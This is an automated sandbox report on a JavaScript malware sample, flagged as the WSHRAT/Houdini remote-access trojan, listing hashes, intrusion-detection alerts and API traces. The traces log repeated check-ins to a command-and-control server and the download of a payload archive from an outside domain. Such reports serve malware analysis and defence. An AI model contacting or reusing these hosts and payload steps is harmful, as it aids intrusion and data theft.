Summary | ZeroBOX

Rechnung.js

Category Machine Started Completed
FILE s1_win7_x6401 March 18, 2021, 12:05 a.m. March 18, 2021, 12:07 a.m.
Size 179.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 f94bfce5384f10201df977d67ea6c5d1
SHA256 ba25eeb1352d5aab2e09eaa942324510ecd964671e7def1e158c3a543534ca1b
CRC32 BCD98544
ssdeep 3072:+p1gHeX3reX0f6ZKOBRY+7Q0bamKZtvEzKbURCqeGK/6SbIpklgVDSxGfmuZyas:+p1gHeX3reX0f6ZKwRY+cM24RCqeGKZR
Yara
  • rat_vnc - Remote Administration toolkit VNC

IP Address Status Action
164.124.101.2 Active Moloch
194.59.164.67 Active Moloch
208.95.112.1 Active Moloch
79.134.225.94 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49202 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49202 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49199 -> 208.95.112.1:80 2022082 ET POLICY External IP Lookup ip-api.com Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 79.134.225.94:5200 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 79.134.225.94:5200 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
request GET http://ip-api.com/json/
request GET http://wshsoft.company/python27.zip
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d02000
process_handle: 0xffffffff
1 0 0
description wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3343701
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351093
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351091
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351351
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351351
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3351351
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13714161664
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
domain ip-api.com
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\sqlite3.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libcrypto-1_1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libssl-1_1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tcl86t.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tk86t.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\ctypes\macholib\fetch_macholib.bat
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_aesni.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_cfb.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\_ctypes.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_des3.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_ctr.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_arc2.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_aes.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\sqlite3.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_ofb.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libcrypto-1_1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_chacha20.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_Salsa20.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_ARC4.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_raw_des.cp37-win32.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libssl-1_1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tk86t.dll
url https://nid.naver.com/login/css/global/desktop/w_20190509.css?dt=20190509
url http://www.expedia.com/favicon.ico
url http://uk.ask.com/favicon.ico
url http://www.priceminister.com/
url http://google.com/
url http://blogimgs.naver.com/nblog/skins/wholebox/0126_f982.gif
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38528621599152653.jpeg%22
url http://www.iask.com/favicon.ico
url https://s.pstatic.net/static/www/mobile/edit/2020/0804/cropImg_728x360_38481254551659019.jpeg
url https://s.pstatic.net/shopping.phinf/20200805_10/f1e83251-9248-4d4e-8d2e-d1505a55bc83.jpg?type=f214_292
url http://www.merlin.com.pl/favicon.ico
url http://www.cnet.com/favicon.ico
url https://ssl.pstatic.net/tveta/libs/assets/js/common/min/probe.min.js
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic1.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0806%2FcropImg_222x145_38626953912837677.png%22
url https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
url http://fpdownload.macromedia.com/pub/flashplayer/masterversion/crossdomain.xml
url https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url http://www.snee.com/xml/xslt/sample.doc
url http://www.yceml.net/0559/10408495-1499411010011
url https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg
url https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/529.png
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22
url http://blogimgs.naver.net/nblog/mylog/post/btn_cancel3.gif
url https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url https://ssl.pstatic.net/static/pwe/nm/b.gif
url http://search.nifty.com/
url https://castbox.shopping.naver.com/js/lazyload.js
url http://ns.adobe.com/exif/1.0/
url https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2Fmobile_17061525298c.jpg%22
url http://www.etmall.com.tw/
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0804%2Fmobile_212629657646c.jpg%22
url http://search.goo.ne.jp/
url http://fr.wikipedia.org/favicon.ico
url https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url http://busca.estadao.com.br/favicon.ico
url http://search.hanafos.com/favicon.ico
url https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png
url https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg
url http://search.chol.com/favicon.ico
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png
url http://search.livedoor.com/favicon.ico
url https://file-examples-com.github.io/uploads/2017/02/file-sample_1MB.doc
url https://ssl.pstatic.net/static/common/myarea/myInfo.gif
url http://amazon.fr/
description Listen for incoming communication rule network_tcp_listen
description Malware can spread east-west file rule spreading_file
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Hijack network configuration rule hijack_network
description Create a windows service rule create_service
description Create a COM server rule create_com_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over Toredo network rule network_toredo
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalade priviledges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west file rule spreading_file
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Hijack network configuration rule hijack_network
description Create a windows service rule create_service
wmi select * from win32_logicaldisk
host 79.134.225.94
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

InternetCrackUrlW

url: http://ip-api.com/json/
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /json/
1 13369356 0

InternetCrackUrlA

url: http://ip-api.com/json/
flags: 0
1 1 0

InternetReadFile

buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.5079,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"}
request_handle: 0x00cc000c
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetReadFile

buffer: install-sdk
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/moz-sdk
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /moz-sdk
1 13369356 0

InternetReadFile

buffer: http://wshsoft.company/python27.zip
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

url: http://wshsoft.company/python27.zip
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /python27.zip
1 13369356 0

InternetCrackUrlA

url: http://wshsoft.company/python27.zip
flags: 0
1 1 0

InternetReadFile

buffer: PK'²—M= Àÿ(8I"api-ms-win-core-console-l1-1-0.dllí{XSK·öNBïHÐ ìB^¤i¢ é!4!QPEAŠT+ˆ"*Šˆˆ(½#6ŠEDAD¹;=úóßûçÜïîæYɞ5kÖ^3³æ5k —cˆ Xºt€?¿(²l¢·Ø€2Æf±r˜y³˜½o(2˜äMÀ =pAD¤;I Dú" ¬ìAžxVV&ÉeϘ«O³à“Vh<ŸœMýÆ%gQ¿O%-•½©|[_Šœµ!˜Ãàé–xъ=\ŒÆÆÐKZ¹8 B.ßQîáÀ|'ê.ñY6ÐxèÐRp,7æø®àyðýBÀäê2 ¨i­*Cìߥ@ÄG¡oyJÿ8 ¢ôþ£ ¶+B À²mƒ: ?Êé,OóÊRÔl€Èž¢e+u¬yBt ª;öSðãekg`g¡W[ӑƒe5¾©vB&ßó# âã‚}Q¡¨ß@”G}†ùãQþh*{º/+àX3‚'Žˆ[²§è[Yrç͞îÞ¹å¹PÀ/ÉQ;N•ƒú. ¢)"Û!Þ1Ä7øŵҏ2HÅN¶eZ•·C”Ñ0Dôk`=DŽ‡¨¢)ˆ¹À¢ ˆ2 ª‡h"nnèÚÍA$ É@ Q9D#1@2XˆÜ!ŠƒèD/ ¢ã¦XƒæM-4ÅôÐÔ1B¾Ê ¹럍£§¿? ëïä¡¿Äüð„@¼¿Fá®1ž¸|«oý]äî÷‚´l%Då/Z…ƒÃˆ¿Ö÷­bY†¸ã V^ËU¦Pa8>úCË!fÇû­fë~oøÇ*[<Îs™³JîîªÂÏúþXõ3Çñ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

